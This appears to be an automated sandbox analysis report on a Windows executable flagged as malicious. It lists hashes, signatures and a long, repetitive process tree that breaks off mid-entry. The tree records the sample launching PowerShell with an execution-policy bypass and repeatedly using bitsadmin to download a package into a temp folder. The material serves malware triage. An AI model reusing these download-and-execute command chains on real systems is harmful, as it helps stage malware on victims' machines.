Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    30-05-2022 17:36

General

  • Target

    251593.exe

  • Size

    386KB

  • MD5

    8a405c527be3468739c3ae626305ea60

  • SHA1

    6461e343fd6ee5be0a1ce80a933278a1c11c9292

  • SHA256

    580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63

  • SHA512

    79a4823bd6995d9d6868bed2dbdfd324a3ca7af1e1aa4696255602f20df90258e7693c0292c579aa5a8e903d0504f6edd64c06ab868c621997217d20b038ef72

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://chocolatey.org/7za.exe

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Download via BitsAdmin 1 TTPs 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\251593.exe
    "C:\Users\Admin\AppData\Local\Temp\251593.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -ep Unrestricted -f "C:\ProgramData\a81Pa4oUST.ps1" | find /v "" >> "C:\Users\Admin\AppData\Local\Temp\TVHJCWMH.log"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep Unrestricted -f "C:\ProgramData\a81Pa4oUST.ps1"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1984
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
            5⤵
            • Download via BitsAdmin
            PID:1808
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
            5⤵
            • Download via BitsAdmin
            PID:1760
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:968
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
            5⤵
              PID:1800
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\SysWOW64\bitsadmin.exe
              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
              5⤵
              • Download via BitsAdmin
              PID:652
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1784
            • C:\Windows\SysWOW64\bitsadmin.exe
              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
              5⤵
                PID:1288
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1508
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                5⤵
                • Download via BitsAdmin
                PID:1944
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
              4⤵
                PID:992
                • C:\Windows\SysWOW64\bitsadmin.exe
                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                  5⤵
                  • Download via BitsAdmin
                  PID:284
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                4⤵
                  PID:1060
                  • C:\Windows\SysWOW64\bitsadmin.exe
                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                    5⤵
                      PID:908
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                    4⤵
                      PID:848
                      • C:\Windows\SysWOW64\bitsadmin.exe
                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                        5⤵
                        • Download via BitsAdmin
                        PID:1720
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                      4⤵
                        PID:1676
                        • C:\Windows\SysWOW64\bitsadmin.exe
                          bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                          5⤵
                          • Download via BitsAdmin
                          PID:652
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                        4⤵
                          PID:1380
                          • C:\Windows\SysWOW64\bitsadmin.exe
                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                            5⤵
                              PID:1000
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                            4⤵
                              PID:1748
                              • C:\Windows\SysWOW64\bitsadmin.exe
                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                5⤵
                                • Download via BitsAdmin
                                PID:1444
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                              4⤵
                                PID:1516
                                • C:\Windows\SysWOW64\bitsadmin.exe
                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                  5⤵
                                    PID:564
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                  4⤵
                                    PID:1616
                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                      bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                      5⤵
                                      • Download via BitsAdmin
                                      PID:1644
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                    4⤵
                                      PID:1224
                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                        5⤵
                                          PID:1120
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                        4⤵
                                          PID:652
                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                            5⤵
                                            • Download via BitsAdmin
                                            PID:608
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                          4⤵
                                            PID:1352
                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                              5⤵
                                                PID:968
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                              4⤵
                                                PID:1744
                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                  5⤵
                                                    PID:1656
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                  4⤵
                                                    PID:852
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                      5⤵
                                                        PID:1140
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                      4⤵
                                                        PID:1680
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                          5⤵
                                                            PID:1904
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                          4⤵
                                                            PID:1532
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                              5⤵
                                                                PID:608
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                              4⤵
                                                                PID:1784
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                  5⤵
                                                                  • Download via BitsAdmin
                                                                  PID:1288
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                4⤵
                                                                  PID:564
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                    5⤵
                                                                    • Download via BitsAdmin
                                                                    PID:2020
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                  4⤵
                                                                    PID:1060
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                      5⤵
                                                                      • Download via BitsAdmin
                                                                      PID:1380
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                    4⤵
                                                                      PID:1556
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                        5⤵
                                                                          PID:1720
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                        4⤵
                                                                          PID:836
                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                            5⤵
                                                                            • Download via BitsAdmin
                                                                            PID:1584
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                          4⤵
                                                                            PID:1820
                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                              5⤵
                                                                              • Download via BitsAdmin
                                                                              PID:1932
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                            4⤵
                                                                              PID:284
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                5⤵
                                                                                  PID:1288
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                4⤵
                                                                                  PID:1604
                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                    5⤵
                                                                                    • Download via BitsAdmin
                                                                                    PID:1144
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                  4⤵
                                                                                    PID:1640
                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                      bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                      5⤵
                                                                                      • Download via BitsAdmin
                                                                                      PID:1676
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                    4⤵
                                                                                      PID:1140
                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                        5⤵
                                                                                          PID:668
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                        4⤵
                                                                                          PID:1776
                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                            5⤵
                                                                                            • Download via BitsAdmin
                                                                                            PID:1812
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                          4⤵
                                                                                            PID:1632
                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                              5⤵
                                                                                              • Download via BitsAdmin
                                                                                              PID:1984
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                            4⤵
                                                                                              PID:880
                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                5⤵
                                                                                                • Download via BitsAdmin
                                                                                                PID:1360
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                              4⤵
                                                                                                PID:832
                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                  5⤵
                                                                                                    PID:1224
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                  4⤵
                                                                                                    PID:1800
                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                      bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                      5⤵
                                                                                                        PID:1760
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                      4⤵
                                                                                                        PID:1120
                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                          bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                          5⤵
                                                                                                            PID:1784
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                          4⤵
                                                                                                            PID:1556
                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                              5⤵
                                                                                                              • Download via BitsAdmin
                                                                                                              PID:1260
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                            4⤵
                                                                                                              PID:1652
                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                5⤵
                                                                                                                  PID:1000
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                4⤵
                                                                                                                  PID:1864
                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                    5⤵
                                                                                                                      PID:956
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                    4⤵
                                                                                                                      PID:1436
                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                        5⤵
                                                                                                                          PID:2012
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                        4⤵
                                                                                                                          PID:1096
                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                            5⤵
                                                                                                                              PID:808
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                            4⤵
                                                                                                                              PID:1644
                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                5⤵
                                                                                                                                  PID:908
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                4⤵
                                                                                                                                  PID:1720
                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                    5⤵
                                                                                                                                      PID:1744
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                    4⤵
                                                                                                                                      PID:432
                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                        5⤵
                                                                                                                                          PID:1392
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                        4⤵
                                                                                                                                          PID:1308
                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
